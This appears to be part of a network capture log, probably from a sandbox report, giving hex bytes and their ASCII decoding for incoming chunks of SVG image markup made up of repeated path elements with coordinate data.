                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13148INData Raw: 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2e 32 31 2c 32 34 38 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2c 32 34 30 2e 34 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: lass="cls-7" d="M631.21,248.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"></path><path class="cls-7" d="M631,240.43a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.67,2.67,0,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13164INData Raw: 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 35 30 2e 38 31 2c 31 33 31 2e 36 31 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                                                                                                                          Data Ascii: .05,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M650.81,131.61a1.92,1.92,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.34,2.34,0,0,1,.18,3.17"></path><path c
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13180INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 38 33 2c 32 33 38 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 35 37 2c 32 33 30 2e 38 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: <path class="cls-7" d="M685.83,238.58a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M685.57,230.86a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13996INData Raw: 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 30 35 2e 34 33 2c 31 32 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                                                                                                                          Data Ascii: .66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class="cls-7" d="M705.43,122a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14012INData Raw: 34 30 2e 34 35 2c 32 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 34 30 2e 31 39 2c 32 32 31 2e 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: 40.45,229a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M740.19,221.29a1.92,1.92,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14028INData Raw: 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 30 2e 30 35 2c 31 31 32 2e 34 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 35 39 2e 37 39 2c 31 30 34
                                                                                                                                                                                                                                                                          Data Ascii: 2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M760.05,112.46a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M759.79,104
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14044INData Raw: 4d 36 36 31 2e 31 36 2c 33 38 31 2e 31 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 36 31 2e 32 33 2c 33 37 32 2e 34 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: M661.16,381.13a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M661.23,372.45a2.16,2.16,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14060INData Raw: 32 33 33 2e 38 31 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 39 2c 32 32 35 2e 31 33 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e
                                                                                                                                                                                                                                                                          Data Ascii: 233.81a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M689,225.13a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14076INData Raw: 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2e 34 33 2c 33 32 30 2e 39 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73
                                                                                                                                                                                                                                                                          Data Ascii: -4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path class="cls-9" d="M723.43,320.92a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path clas
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14092INData Raw: 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 38 36 2c 34 31 36 2e 37 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 39 33 2c 34 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M757.86,416.72a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M757.93,408a2.15,2.15,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14108INData Raw: 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 36 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 1,0,3.58"></path><path class="cls-9" d="M785.62,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14124INData Raw: 4d 38 32 30 2e 30 35 2c 33 36 35 2e 31 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 31 33 2c 33 35 36 2e 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: M820.05,365.18a2.16,2.16,0,0,1-1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M820.13,356.5a2.16,2.16,0,0,1-1.1,2.76,3.16,3.16,0,0,1-4.12-1.36,3,3,0,0,1,.8-3.58,2.8,2.8,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14140INData Raw: 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 34 2e 35 36 2c 34 35 32 2e 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38
                                                                                                                                                                                                                                                                          Data Ascii: 2.75,3.15,3.15,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M854.56,452.3a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14156INData Raw: 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 33 32 2c 33 30 35 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 34 2c 32 39 36 2e 32 39 61 32 2e 31 35 2c
                                                                                                                                                                                                                                                                          Data Ascii: .82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M882.32,305a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M882.4,296.29a2.15,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14172INData Raw: 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 37 35 2c 34 30 30 2e 37 37 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 38 33 2c 33 39 32 2e 30 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M916.75,400.77a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M916.83,392.09a2.16,2.16,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14444INData Raw: 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 35 32 2c 32 35 33 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 36 2c 32 34 34 2e 37 36 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e
                                                                                                                                                                                                                                                                          Data Ascii: "cls-9" d="M944.52,253.44a2.16,2.16,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M944.6,244.76a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14460INData Raw: 37 37 2c 32 32 35 2e 35 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 34 39 2e 34 37 2c 32 31 36 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                          Data Ascii: 77,225.59a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M49.47,216.82a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3
